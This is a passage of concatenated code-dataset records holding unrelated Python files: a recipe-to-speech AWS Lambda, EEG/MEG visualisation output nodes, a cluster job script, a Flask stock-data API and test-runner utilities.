json.loads(jdata) \n recipeTitle= parsed_json1['recipeTitle']\n recipeSleep=parsed_json1['recipeIns'][0]['sleep']\n recipeIns=parsed_json1['recipeIns']\n finalrecipe=''\n \n newKey = key.replace( '.json', '.mp3' )\n txtKey = key.replace( '.json', '.txt' )\n \n #loop over parsed data and create ssml for polly with breaks\n for ins in recipeIns:\n outSleep=ins['sleep']\n outIns=ins['instruction']\n pprint('{}'.format(outIns, outSleep))\n finalrecipe= finalrecipe + '{} '.format(outIns, outSleep)\n \n s3.Bucket('cmpe281-recipe').put_object(Key=txtKey, Body=finalrecipe)\n \n pprint(finalrecipe)\n pprint('****** Get ready for POLLY ******')\n \n pollyclient = boto3.client('polly',aws_access_key_id='__AWS_ID__', aws_secret_access_key='__AWS_KEY__')\n mp3key=recipeTitle+'.mp3'\n \n #calling polly function to create mp3 for our recipes!!\n response = pollyclient.synthesize_speech(\n Text = ''+'Here we go with'+ recipeTitle + finalrecipe +'',\n TextType ='ssml',\n VoiceId='Joanna',\n OutputFormat='mp3')\n \n #putting polly mp3 file - streaming object to s3 bucket\n with closing(response[\"AudioStream\"]) as stream:\n s3.Bucket('cmpe281-mp3').put_object(Key=newKey, Body=stream.read())\n \n return 'HiFi from Food Admin'\n","sub_path":"src/lambda/Converter.py","file_name":"Converter.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"138801425","text":"\"\"\"\nDefinition of pipeline output nodes\n\nExposed classes\n---------------\nLSLStreamOutput: OutputNode\n Output signal to LSL stream\nBrainViewer: _WidgetOutput\n Plot heatmap on a 3d brain\nSignalViewer: _WidgetOutput\n Plot signals\nFileOutput: OutputNode\n Output signal to file\nTorchOutput: OutputNode\n Wrap signal in Torch tensors\nConnectivityViewer: _WidgetOutput\n Plot connectivity\n\n\"\"\"\nimport os\nimport time\nfrom types import SimpleNamespace\n\nimport tables\nfrom PyQt5.QtWidgets import QApplication\n\nimport mne\nimport numpy as np\nfrom scipy import sparse\n\nfrom ..utils.pysurfer.smoothing_matrix import smoothing_matrix, mesh_edges\nfrom .node import OutputNode\nfrom .. import CHANNEL_AXIS, TIME_AXIS, PYNFB_TIME_AXIS\nfrom ..utils.lsl import (\n convert_numpy_format_to_lsl,\n convert_numpy_array_to_lsl_chunk,\n create_lsl_outlet,\n)\nfrom ..utils.matrix_functions import last_sample, make_time_dimension_second\nfrom ..utils.ring_buffer import RingBuffer\nfrom ..utils.channels import read_channel_types, channel_labels_saver\nfrom ..utils.inverse_model import get_mesh_data_from_forward_solution\nfrom ..utils.brain_visualization import get_mesh_data_from_surfaces_dir\nfrom vendor.nfb.pynfb.widgets.signal_viewers import RawSignalViewer\n\nfrom ..gui.connect_obj import ConnectObj\nfrom ..gui.source_obj import SourceObj\nfrom vispy import scene\n\n\n# -------- gif recorder -------- #\nfrom PIL import Image as im\n\n# ------------------------------ #\n\n__all__ = (\n \"LSLStreamOutput\",\n \"BrainViewer\",\n \"SignalViewer\",\n \"FileOutput\",\n \"TorchOutput\",\n \"ConnectivityViewer\",\n)\n\n\nclass _WidgetOutput(OutputNode):\n \"\"\"Abstract class for widget initialization logic with qt signals\"\"\"\n\n def __init__(self, *pargs, **kwargs):\n OutputNode.__init__(self, *pargs, **kwargs)\n self._signal_sender.init_widget_sig.connect(self._init_widget)\n self._signal_sender.draw_sig.connect(self.on_draw)\n\n def _init_widget(self):\n if self.widget and self.widget.parent():\n parent = self.widget.parent()\n old_widget = self.widget\n else:\n parent = None\n self.widget = self._create_widget()\n if parent:\n parent.setWidget(self.widget)\n old_widget.deleteLater()\n else:\n self.root._signal_sender.node_widget_added.emit(\n self.widget, repr(self)\n )\n self.widget.pipeline_node = self\n\n def _create_widget(self):\n raise NotImplementedError\n\n def on_draw(self):\n raise NotImplementedError\n\n\nclass LSLStreamOutput(OutputNode):\n def _on_input_history_invalidation(self):\n pass\n\n def _check_value(self, key, value):\n pass # TODO: check that value as a string usable as a stream name\n\n CHANGES_IN_THESE_REQUIRE_RESET = (\"stream_name\",)\n\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = (\n \"source_name\",\n \"mne_info\",\n \"dtype\",\n )\n\n SAVERS_FOR_UPSTREAM_MUTABLE_OBJECTS = {\n \"mne_info\": lambda info: (info[\"sfreq\"],) + channel_labels_saver(info)\n }\n\n def _on_critical_attr_change(self, key, old_val, new_val) -> bool:\n # It is impossible to change then name of an already\n # started stream so we have to initialize again\n self.initialize()\n\n def __init__(self, stream_name=None):\n super().__init__()\n self._provided_stream_name = stream_name\n self.stream_name = None\n self._outlet = None\n\n def _initialize(self):\n # If no name was supplied use a modified\n # version of the source name (a file or a stream name)\n source_name = self.traverse_back_and_find(\"source_name\")\n if not self.stream_name:\n self.stream_name = source_name + \"_output\"\n\n # Get other info from somewhere down the predecessor chain\n dtype = self.traverse_back_and_find(\"dtype\")\n channel_format = convert_numpy_format_to_lsl(dtype)\n mne_info = self.traverse_back_and_find(\"mne_info\")\n frequency = mne_info[\"sfreq\"]\n channel_labels = mne_info[\"ch_names\"]\n channel_types = read_channel_types(mne_info)\n\n self._outlet = create_lsl_outlet(\n name=self.stream_name,\n frequency=frequency,\n channel_format=channel_format,\n channel_labels=channel_labels,\n channel_types=channel_types,\n )\n\n def _update(self):\n chunk = self.parent.output\n lsl_chunk = convert_numpy_array_to_lsl_chunk(chunk)\n self._outlet.push_chunk(lsl_chunk)\n\n\nclass BrainViewer(_WidgetOutput):\n\n CHANGES_IN_THESE_REQUIRE_RESET = (\n \"buffer_length\",\n \"take_abs\",\n \"limits_mode\",\n \"threshold_pct\",\n )\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = (\n \"fwd_path\",\n \"mne_info\",\n )\n\n SAVERS_FOR_UPSTREAM_MUTABLE_OBJECTS = {\"mne_info\": channel_labels_saver}\n\n LIMITS_MODES = SimpleNamespace(\n GLOBAL=\"Global\", LOCAL=\"Local\", MANUAL=\"Manual\"\n )\n\n def __init__(\n self,\n take_abs=True,\n limits_mode=LIMITS_MODES.LOCAL,\n buffer_length=1,\n threshold_pct=50,\n ):\n super().__init__()\n\n self.limits_mode = limits_mode\n self.lock_limits = False\n self.buffer_length = buffer_length\n self.take_abs = take_abs\n self.colormap_limits = SimpleNamespace(lower=None, upper=None)\n self.threshold_pct = threshold_pct\n\n self._limits_buffer = None\n self.surfaces_dir = None\n self._mesh = None\n self._smoothing_matrix = None\n self.widget = None\n self.output = None\n\n # -------- gif recorder -------- #\n self.is_recording = False\n self.sector = None\n\n self._start_time = None\n self._display_time = None # Time in ms between switching images\n\n self._images = []\n self._signal_sender.screenshot_sig.connect(self._append_screenshot)\n # ------------------------------ #\n\n def _initialize(self):\n fwd_path = self.traverse_back_and_find(\"fwd_path\")\n subject = self.traverse_back_and_find(\"subject\")\n subjects_dir = self.traverse_back_and_find(\"subjects_dir\")\n self.surfaces_dir = os.path.join(subjects_dir, subject)\n\n frequency = self.traverse_back_and_find(\"mne_info\")[\"sfreq\"]\n buffer_sample_count = np.int(self.buffer_length * frequency)\n self._limits_buffer = RingBuffer(row_cnt=2, maxlen=buffer_sample_count)\n\n self.forward_solution = mne.read_forward_solution(\n fwd_path, verbose=\"ERROR\"\n )\n self._mesh = get_mesh_data_from_surfaces_dir(self.surfaces_dir)\n self._signal_sender.init_widget_sig.emit()\n self._smoothing_matrix = self._get_smoothing_matrix(fwd_path)\n\n def _on_input_history_invalidation(self):\n # TODO: change min-max buffer values\n pass\n\n def _check_value(self, key, value):\n pass\n\n def _on_critical_attr_change(self, key, old_val, new_val) -> bool:\n self._limits_buffer.clear()\n\n def _update(self):\n sources = self.parent.output\n self.output = sources\n if self.take_abs:\n sources = np.abs(sources)\n self._update_colormap_limits(sources)\n normalized_sources = self._normalize_sources(last_sample(sources))\n self._signal_sender.draw_sig.emit(normalized_sources)\n\n if self.is_recording:\n self._signal_sender.screenshot_sig.emit()\n\n def _update_colormap_limits(self, sources):\n self._limits_buffer.extend(\n np.array(\n [\n make_time_dimension_second(\n np.min(sources, axis=CHANNEL_AXIS)\n ),\n make_time_dimension_second(\n np.max(sources, axis=CHANNEL_AXIS)\n ),\n ]\n )\n )\n\n if self.limits_mode == self.LIMITS_MODES.GLOBAL:\n mins, maxs = self._limits_buffer.data\n self.colormap_limits.lower = np.percentile(mins, q=5)\n self.colormap_limits.upper = np.percentile(maxs, q=95)\n elif self.limits_mode == self.LIMITS_MODES.LOCAL:\n sources = last_sample(sources)\n self.colormap_limits.lower = np.min(sources)\n self.colormap_limits.upper = np.max(sources)\n elif self.limits_mode == self.LIMITS_MODES.MANUAL:\n pass\n\n def _normalize_sources(self, last_sources):\n minimum = self.colormap_limits.lower\n maximum = self.colormap_limits.upper\n if minimum == maximum:\n return last_sources * 0\n else:\n return (last_sources - minimum) / (maximum - minimum)\n\n def on_draw(self, normalized_values):\n QApplication.processEvents()\n if self._smoothing_matrix is not None:\n sources_smoothed = self._smoothing_matrix.dot(normalized_values)\n else:\n self._logger.debug(\"Draw without smoothing\")\n sources_smoothed = normalized_values\n threshold = self.threshold_pct / 100\n mask = sources_smoothed <= threshold\n\n # reset colors to white\n self._mesh._alphas[:, :] = 0.0\n self._mesh._alphas_buffer.set_data(self._mesh._alphas)\n\n if np.any(~mask):\n self._mesh.add_overlay(\n sources_smoothed[~mask],\n vertices=np.where(~mask)[0],\n to_overlay=1,\n )\n\n self._mesh.update()\n # if self._logger.getEffectiveLevel() == 20: # INFO level\n self.canvas.measure_fps(\n window=10, callback=self._signal_sender.fps_updated.emit\n )\n\n def _create_widget(self):\n canvas = scene.SceneCanvas(keys=\"interactive\", show=False)\n self.canvas = canvas\n\n # Add a ViewBox to let the user zoom/rotate\n view = canvas.central_widget.add_view()\n view.camera = \"turntable\"\n view.camera.fov = 50\n view.camera.distance = 400\n # Make light follow the camera\n self._mesh.shared_program.frag[\"camtf\"] = view.camera.transform\n view.add(self._mesh)\n return canvas.native\n\n def _get_smoothing_matrix(self, fwd_path):\n \"\"\"\n Creates or loads a smoothing matrix that lets us\n interpolate source values onto all mesh vertices\n\n \"\"\"\n # Not all the vertices in the forward solution mesh are sources.\n # sources_idx actually indexes into the union of\n # high-definition meshes for left and right hemispheres.\n # The smoothing matrix then lets us assign a color to each vertex.\n # If in future we decide to use low-definition mesh from\n # the forward model for drawing, we should index into that.\n # Shorter: the coordinates of the jth source are\n # in self._mesh.vertexes()[sources_idx[j], :]\n smoothing_matrix_file_path = (\n os.path.splitext(fwd_path)[0] + \"-smoothing-matrix.npz\"\n )\n try:\n return sparse.load_npz(smoothing_matrix_file_path)\n except FileNotFoundError:\n self._logger.info(\n \"Calculating smoothing matrix.\"\n + \" This might take a while the first time.\"\n )\n sources_idx, *_ = get_mesh_data_from_forward_solution(\n self.forward_solution\n )\n adj_mat = mesh_edges(self._mesh._faces)\n smoothing_mat = smoothing_matrix(sources_idx, adj_mat)\n sparse.save_npz(smoothing_matrix_file_path, smoothing_mat)\n return smoothing_mat\n\n def _start_gif(self):\n self._images = []\n self._gif_times = []\n self._gif_start_time = time.time()\n\n self.is_recording = True\n\n def _stop_gif(self):\n self.is_recording = False\n\n duration = time.time() - self._gif_start_time\n self._display_time = (duration * 1000) / len(self._images)\n\n def _save_gif(self, path):\n try:\n self._images[0].save(\n path,\n save_all=True,\n append_images=self._images[1:],\n duration=self._display_time,\n loop=0,\n )\n\n base, ext = os.path.splitext(path)\n times_savepath = base + \"_gif_times.txt\"\n with open(times_savepath, \"w\") as f:\n for t in self._gif_times:\n f.write(\"%1.3f\\n\" % t)\n except Exception as e:\n self._logger.exception(e)\n self._root._signal_sender.request_message.emit(\n \"Saving gif to %s failed!\" % path, str(e), \"error\"\n )\n\n def _append_screenshot(self):\n last_sample_time = self.traverse_back_and_find(\"timestamps\")[-1]\n self._gif_times.append(last_sample_time)\n self._images.append(im.fromarray(self.canvas.render()))\n\n\nclass SignalViewer(_WidgetOutput):\n CHANGES_IN_THESE_REQUIRE_RESET = ()\n\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = (\"mne_info\",)\n SAVERS_FOR_UPSTREAM_MUTABLE_OBJECTS = {\"mne_info\": channel_labels_saver}\n\n def __init__(self):\n super().__init__()\n self.widget = None\n\n def _initialize(self):\n self._signal_sender.init_widget_sig.emit()\n\n def _create_widget(self):\n mne_info = self.traverse_back_and_find(\"mne_info\")\n if mne_info[\"nchan\"]:\n return RawSignalViewer(\n fs=mne_info[\"sfreq\"],\n names=mne_info[\"ch_names\"],\n seconds_to_plot=10,\n )\n else:\n return RawSignalViewer(\n fs=mne_info[\"sfreq\"], names=[\"\"], seconds_to_plot=10\n )\n\n def _update(self):\n chunk = self.parent.output\n self._signal_sender.draw_sig.emit(chunk)\n\n def on_draw(self, chunk):\n QApplication.processEvents()\n if chunk.size:\n if TIME_AXIS == PYNFB_TIME_AXIS:\n self.widget.update(chunk)\n else:\n self.widget.update(chunk.T)\n\n def _on_critical_attr_change(self, key, old_val, new_val) -> bool:\n # Nothing to reset, really\n pass\n\n def _on_input_history_invalidation(self):\n # Doesn't really care, will draw anything\n pass\n\n def _check_value(self, key, value):\n # Nothing to be set\n pass\n\n\nclass FileOutput(OutputNode):\n\n CHANGES_IN_THESE_REQUIRE_RESET = (\"output_path\",)\n\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = (\"mne_info\",)\n SAVERS_FOR_UPSTREAM_MUTABLE_OBJECTS = {\n \"mne_info\": lambda info: (info[\"sfreq\"],) + channel_labels_saver(info)\n }\n\n def _on_input_history_invalidation(self):\n pass\n\n def _check_value(self, key, value):\n pass # TODO: check that value as a string usable as a stream name\n\n def _on_critical_attr_change(self, key, old_val, new_val):\n self.initialize()\n\n def __init__(self, output_path=\"cognigraph_output.h5\"):\n OutputNode.__init__(self)\n self.output_path = output_path\n self._out_file = None\n self._disabled = True\n\n @property\n def disabled(self):\n return self._disabled\n\n @disabled.setter\n def disabled(self, value):\n pass\n\n def _initialize(self):\n if not self._disabled:\n self._logger.debug('Initializing.')\n self._logger.debug('Disabled = %s' % self._disabled)\n if self._out_file: # for resets\n self._out_file.close()\n\n info = self.traverse_back_and_find(\"mne_info\")\n col_size = info[\"nchan\"]\n self._out_file = tables.open_file(self.output_path, mode=\"w\")\n atom = tables.Float64Atom()\n\n self.output_array = self._out_file.create_earray(\n self._out_file.root, \"data\", atom, (col_size, 0)\n )\n self.timestamps_array = self._out_file.create_earray(\n self._out_file.root, \"timestamps\", atom, (1, 0)\n )\n self.ch_names = self._out_file.create_array(\n self._out_file.root,\n \"ch_names\",\n np.array(info[\"ch_names\"]),\n \"Channel names in data\",\n )\n self._out_file.root.data.attrs.sfreq = info[\"sfreq\"]\n try:\n fwd = self.traverse_back_and_find(\"_fwd\")\n self._out_file.create_array(\n self._out_file.root,\n \"src_xyz\",\n fwd['source_rr'],\n \"Source space coordinates\",\n )\n except Exception as e:\n self._logger.exception(e)\n self._logger.warning('Forward model not found.'\n ' Skip adding source coordinates.')\n\n def toggle(self):\n if self._disabled:\n self._start()\n else:\n self._stop()\n\n def _stop(self):\n self._out_file.close()\n self._disabled = True\n\n def _start(self):\n self._disabled = False\n self._initialize()\n\n def _update(self):\n data_chunk = self.parent.output\n timestamps = np.array(self.traverse_back_and_find(\"timestamps\"))[\n np.newaxis, :\n ]\n self.output_array.append(data_chunk)\n self.timestamps_array.append(timestamps)\n\n\nclass TorchOutput(OutputNode):\n\n CHANGES_IN_THESE_REQUIRE_RESET = ()\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = ()\n\n def _on_input_history_invalidation(self):\n pass\n\n def _check_value(self, key, value):\n pass # TODO: check that value as a string usable as a stream name\n\n def _on_critical_attr_change(self, key, old_val, new_val) -> bool:\n pass\n\n def _initialize(self):\n pass\n\n def _update(self):\n import torch\n\n self.output = torch.from_numpy(self.parent.output)\n\n\nclass ConnectivityViewer(_WidgetOutput):\n \"\"\"Plot connectivity matrix on glass brain\"\"\"\n\n CHANGES_IN_THESE_REQUIRE_RESET = (\"n_lines\",)\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = (\"mne_info\",)\n\n def __init__(self, n_lines=30):\n super().__init__()\n self._mesh = None\n self.widget = None\n self.s_obj = None\n self.c_obj = None\n self.view = None\n self.n_lines = n_lines\n\n def _initialize(self):\n self.mne_info = self.traverse_back_and_find(\"mne_info\")\n subject = self.traverse_back_and_find(\"subject\")\n subjects_dir = self.traverse_back_and_find(\"subjects_dir\")\n self.surfaces_dir = os.path.join(subjects_dir, subject)\n\n self._mesh = get_mesh_data_from_surfaces_dir(\n self.surfaces_dir, translucent=True\n )\n self._signal_sender.init_widget_sig.emit()\n\n def _update(self):\n input_data = np.abs(self.parent.output) # connectivity matrix\n # 1. Get n_lines stronges connections indices (i, j)\n # get only off-diagonal elements\n l_triang = np.tril(input_data, k=-1)\n nl = self.n_lines\n n_ch = input_data.shape[0]\n nl_max = int(n_ch * (n_ch - 1) / 2)\n if nl > nl_max:\n nl = nl_max\n ii, jj = np.unravel_index(\n np.argpartition(-l_triang, nl, axis=None)[:nl], l_triang.shape\n )\n # 2. Get corresponding vertices indices\n nodes_inds = np.unique(np.r_[ii, jj])\n labels = self.traverse_back_and_find(\"labels\")\n active_labels = [l for l in labels if l.is_active]\n nodes_inds_surf = np.array(\n [active_labels[i].mass_center for i in nodes_inds]\n )\n # 3. Get nodes = xyz of these vertices\n nodes = self._mesh._vertices[nodes_inds_surf]\n # 4. Edges are input data restricted to best n_lines nodes\n edges = input_data[nodes_inds[:, None], nodes_inds] # None needed\n # 5. Select = mask matrix with True in (i,j)-th positions\n select = np.zeros_like(input_data, dtype=bool)\n select[ii, jj] = True\n select = select[nodes_inds[:, None], nodes_inds]\n select += select.T\n nchan = self.mne_info[\"nchan\"]\n assert input_data.shape == (\n nchan,\n nchan,\n ), \"Number of channels doesnt conform to input data shape\"\n try:\n self.s_obj._sources.visible = False\n except Exception:\n pass\n try:\n self.c_obj._connect.visible = False\n except Exception:\n pass\n\n self.s_obj = SourceObj(\n \"sources\", nodes, color=\"#ab4642\", radius_min=20.0\n )\n\n self.c_obj = ConnectObj(\n \"default\",\n nodes,\n edges,\n select=select,\n line_width=2.0,\n cmap=\"Spectral_r\",\n color_by=\"strength\",\n )\n self._signal_sender.draw_sig.emit(None)\n\n def on_draw(self):\n self.view.add(self.s_obj._sources)\n self.view.add(self.c_obj._connect)\n\n def _on_critical_attr_change(self, key, old_val, new_val) -> bool:\n pass\n\n def _on_input_history_invalidation(self):\n pass\n\n def _check_value(self, key, value):\n pass\n\n def _create_widget(self):\n canvas = scene.SceneCanvas(keys=\"interactive\", show=False)\n self.canvas = canvas\n\n # Add a ViewBox to let the user zoom/rotate\n self.view = canvas.central_widget.add_view()\n self.view.camera = \"turntable\"\n self.view.camera.fov = 50\n self.view.camera.distance = 400\n # Make light follow the camera\n self._mesh.shared_program.frag[\"camtf\"] = self.view.camera.transform\n self.view.add(self._mesh)\n return canvas.native\n","sub_path":"cognigraph/nodes/outputs.py","file_name":"outputs.py","file_ext":"py","file_size_in_byte":21656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125326919","text":"#!/usr/bin/env python2\n\nimport sys\nimport os\nimport time\nimport ipdb\nimport traceback\nfrom shutil import copy\nfrom execo import Process, SshProcess, Remote, format_date, Put\nfrom execo_g5k import oarsub, oardel, OarSubmission, get_oar_job_nodes, wait_oar_job_start\nfrom execo_g5k.kadeploy import deploy, Deployment\nfrom execo_engine import Engine, logger, ParamSweeper, sweep\nfrom execo.report import Report\n\n# defined in __main__\n_site = None\n_nbrNodes = None\n_walltime = None\n_properties = None\n\nscript_path = os.path.dirname(os.path.realpath(__file__))\n\nclass ExecoWorkload(Engine):\n def setup_result_dir(self):\n self.result_dir = script_path + '/' + 'results_' + time.strftime(\"%Y-%m-%d--%H-%M-%S\")\n\n def run(self):\n # Go to the result folder before everything\n os.chdir(self.result_dir)\n\n jobs = [(_jobID, _site)]\n # Get nodes\n nodes = get_oar_job_nodes(_jobID, _site)\n\n try:\n logger.info(\"Creating hostfiles for all combinations...\")\n for nbr_node in _nbrNodes:\n hostfile_filename = self.result_dir + '/' + 'hostfile-' + nbr_node\n with open(hostfile_filename, 'w') as hostfile:\n for node in nodes[:int(nbr_node)]:\n print>>hostfile, node.address\n\n spack_process = Process('spack install -v chameleon@trunk+starpu+fxt ^starpu@svn-trunk+fxt') \n spack_process.start()\n spack_process.wait()\n spack_process.kill()\n\n finally:\n logger.info(\"Delete job: {}\".format(jobs))\n oardel(jobs)\n\nif __name__ == \"__main__\":\n _site = (sys.argv)[1]\n _nbrNodes = (sys.argv)[2]\n _walltime = (sys.argv)[3]\n _properties = (sys.argv)[4]\n\n execo = ExecoWorkload()\n execo.start()\n\n","sub_path":"Execo/execo.py","file_name":"execo.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"397862535","text":"#!/usr/bin/env python\n#-*-coding:utf8-*-\n'''\n数据可视化的API接口\n'''\nfrom strategy import stockPoint\nfrom strategy import hongbao\nfrom dfbrain.helps import time\nfrom dfbrain.db import wind\nfrom dfbrain.db.test import timeStrategy\nfrom flask import Flask,send_file,jsonify,request\nfrom flask.ext.cors import CORS\nimport simplejson as json\nimport pandas as pd\napp = Flask(__name__)\nCORS(app)#让浏览器支持跨域请求\n#生成路径\nimport os\nBASEPATH = os.path.dirname(os.path.abspath(__file__))\n\n@app.route('/index/point',methods=['GET'])\ndef getData():\n \"\"\"获取标记的高低点\n /index/point?ticker=&start=&end=\n args:\n * ticker:股票代码(wind)\n * start:起始日期(例如:20150102)\n * end:终止日期(例如:20150201)\n returns:\n * all:所有的交易数据\n * point:标记高低点的数据(1为高点,-1为低点)\n \"\"\"\n ticker = request.args.get('ticker','000001.SH')\n startDate = request.args.get('start', '19970101')#获取开始日期参数\n endDate = request.args.get('end',time.getTime(0,type='yyyymmdd'))#获取终止日期参数\n data = stockPoint.getPointData(ticker,startDate,endDate)#获取股票数据\n stock =data[['TRADE_DT','S_DQ_OPEN','S_DQ_CLOSE','S_DQ_LOW','S_DQ_HIGH']]\n point = data[data['point']!=0][['TRADE_DT','S_DQ_HIGH']]\n trendPoint = data[(data['trend']!=1)&(data['trend']!=-1)][['TRADE_DT','S_DQ_HIGH']]\n return jsonify(postprocessor({'indexName':ticker,'all':stock.values.tolist(),'point':point.values.tolist(),'trend':trendPoint.values.tolist()}))\n\n@app.route('/index/cumpro',methods=['GET'])\ndef getcumPro():\n \"\"\"获取累计概率分布值\n /index/cumpro?ticker=&tag=&kind=\n args:\n * ticker:股票代码(wind)\n * tag:累计概率分布的类型(例如:timeSpace)\n * kind:累计概率分布种类\n returns:\n * tagName:标签的名称\n * tagData:该标签的种类\n * cumPro:tag子类对应的累计概率值\n * current:当前市场所处的位置\n \"\"\"\n column = request.args.get('tag')#获取要进行标记的标签\n ticker = request.args.get('ticker','000001.SH')\n kind = request.args.get('kind','point')\n data = getPointData(ticker,'19970101',time.getTime(0,type='yyyymmdd'))\n if kind == 'point':\n analyseData = stockPoint.analyseSpace(data)#获取标记的数据\n else:\n analyseData = stockPoint.analyseTrendSpace(data)#获取趋势的标记数据\n pointList = analyseData[kind].values#获取最近一个高低点的类型,或者趋势的类型\n tagData,cumPro,currentData,currentCum = stockPoint.cumPro(analyseData,column,direction=pointList[len(pointList)-1],kind=kind)#获取强度的概率密度函数\n return jsonify(postprocessor({'tagName':column,'tagData':tagData,'cumPro':cumPro,'currentData':str(currentData),'currentCum':currentCum}))#返回两列,列表和概率\n\n@app.route('/index/intensity',methods=['GET'])\ndef getIntensity():\n \"\"\"获取强度值\n \"\"\"\n ticker = request.args.get('ticker','000001.SH')\n kind = request.args.get('kind','point')\n data = getPointData(ticker,'19970101',time.getTime(0,type='yyyymmdd'))\n if kind =='point':\n analyseData = stockPoint.analyseSpace(data)#获取标记的数据\n column = 'intensity'\n else:\n analyseData = stockPoint.analyseTrendSpace(data)#获取趋势标记的数据\n column = 'trendIntensity'\n return jsonify(postprocessor({'intensity':analyseData[column].values.tolist(),'date':analyseData['TRADE_DT'].values.tolist()}))#返回两列,列表和概率\n\n@app.route('/ipfri',methods=['GET'])\ndef getIpfri():\n \"\"\"展示IPFRI和index的对比走势图\n /ipfri?key=&ticker=&start=&end=\n args:\n key:数据库字段中的关键字\n ticker:对比的指数\n start:起始日期\n end:终止日期\n return:\n ipfri:鹰眼指数\n date:日期\n closePrice:指数的收盘价\n ticker:指数的名字\n \"\"\"\n key = request.args.get('key','IPFRI')#获取请求的参数\n ticker = request.args.get('ticker','000001.SH')#对比的指数\n startDate = request.args.get('start','20150401')#起始日期\n endDate = request.args.get('end',time.getTime(0,type='yyyymmdd'))#终止日期\n #获取IPFRI的数据\n t = timeStrategy()\n data = t.getAllData(startDate,endDate,key)\n #获取弘宝的数据\n rateList = hongbao.upRate(data['confirm_date'].values.tolist(),5)\n #获取指数的日期数据\n index = wind.aindexeodprices()\n indexData = index.getIndexData(ticker,startDate,endDate)\n return jsonify(postprocessor({'ipfri':data[key].values.tolist(),'date':data['confirm_date'].values.tolist(),'closePrice':indexData[['S_DQ_OPEN','S_DQ_CLOSE','S_DQ_LOW','S_DQ_HIGH']].values.tolist(),'ticker':ticker,'hongbao':rateList}))\n################################################################################\n#辅助函数\n################################################################################\ndef index_ipfri():\n key = 'IPFRI'\n ticker = '000001.SH'\n startDate = '20160401'\n endDate = time.getTime(0,type='yyyymmdd')\n #获取IPFRI的数据\n t = timeStrategy()\n data = t.getAllData(startDate,endDate,key)\n #获取指数的日期数据\n index = wind.aindexeodprices()\n indexData = index.getIndexData(ticker,startDate,endDate)\n indexData[key] = [0 for i in range(0,len(indexData.values))]\n for i in range(0,len(indexData.values)):\n current_index = indexData.index[i]\n tradeDate = indexData['TRADE_DT'][i]#获取交易日\n indexData.loc[current_index,key] = data[data['confirm_date']==tradeDate][key].values[0]#赋值\n return indexData\n\ndef getPointData(ticker,startDate,endDate):\n \"\"\"\n 从文件中获取数据,如果文件不存在,则执行生成命令\n \"\"\"\n filename = os.path.join(BASEPATH,'strategy/data/'+ticker+'.csv')\n if os.path.exists(filename):\n data = pd.read_csv(filename)\n else:\n data = stockPoint.tagTrend(stockPoint.generatePoint(ticker))\n stockPoint.saveData(data,ticker)\n return data[(data['tradeday_int']>=int(startDate))&(data['tradeday_int']<=int(endDate))]\ndef postprocessor(data):\n \"\"\"\n json化数据\n \"\"\"\n json.dumps(data, use_decimal=True)\n return data\n\nif __name__ == '__main__':\n from werkzeug.contrib.fixers import ProxyFix\n app.wsgi_app = ProxyFix(app.wsgi_app)\n app.debug = True\n app.run()\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"486180834","text":"#!/usr/local/bin/python3\nimport os\nimport sys\nimport subprocess\n\n\ndef test_XCEC(exePath, smt='stp', increment = False, root='./', output='./output/'):\n print(\"The prover is\", smt)\n files = os.listdir(os.path.join(root, 'cases'))\n files.sort(key= lambda x:int(x[4:]))\n if not os.path.exists(os.path.join(root, 'log')):\n os.mkdir(os.path.join(root, 'log'))\n for i, dir in enumerate(files):\n with open(os.path.join(root, 'log/'+dir+'.txt'), 'w', encoding='utf8') as log:\n cmd = [exePath, os.path.join(root, 'cases', dir, 'gf.v'), os.path.join(root, 'cases', dir, 'rf.v'), \n os.path.join(output, 'output_' + dir + '.txt'), smt, 'i' if increment else 'u']\n p = subprocess.Popen(cmd, shell=False, bufsize=0,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n while p.poll() is None:\n nextline = p.stdout.readline()\n log.write(nextline.decode())\n log.flush()\n if p.returncode == 0:\n print(dir + ' success!')\n else:\n print(dir + ' failed!')\n\nif __name__ == \"__main__\":\n smt = 'stp'\n increment = False\n if len(sys.argv) >= 2:\n smt = sys.argv[1]\n if len(sys.argv) >= 3:\n increment = sys.argv[2][0] == 'i'\n test_XCEC('../build/XCEC', smt, increment)\n","sub_path":"test/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"116692267","text":"import os\nimport sys\n\nfrom mach_nix.data.data_interface import NixpkgsDirectory, DependencyDB\nfrom mach_nix.generators.overlay_generator import OverlaysGenerator\nfrom mach_nix.requirements import parse_reqs\nfrom mach_nix.resolver.resolvelib_resolver import ResolvelibResolver\nfrom mach_nix.versions import PyVer\n\n\ndef load_env(name, *args, **kwargs):\n var = os.environ.get(name, *args, **kwargs)\n if var is None:\n print(f'Error: env variable \"{name}\" must not be empty', file=sys.stderr)\n exit(1)\n return var.strip()\n\n\ndef main():\n disable_checks = load_env('disable_checks')\n nixpkgs_commit = load_env('nixpkgs_commit')\n nixpkgs_tarball_sha256 = load_env('nixpkgs_tarball_sha256')\n nixpkgs_json = load_env('nixpkgs_json')\n out_file = load_env('out_file')\n py_ver_str = load_env('py_ver_str')\n prefer_nixpkgs = load_env('prefer_nixpkgs')\n pypi_deps_db_data_dir = load_env('pypi_deps_db_data_dir')\n pypi_fetcher_commit = load_env('pypi_fetcher_commit')\n pypi_fetcher_tarball_sha256 = load_env('pypi_fetcher_tarball_sha256')\n requirements = load_env('requirements')\n\n py_ver = PyVer(py_ver_str)\n nixpkgs = NixpkgsDirectory(nixpkgs_json)\n deps_db = 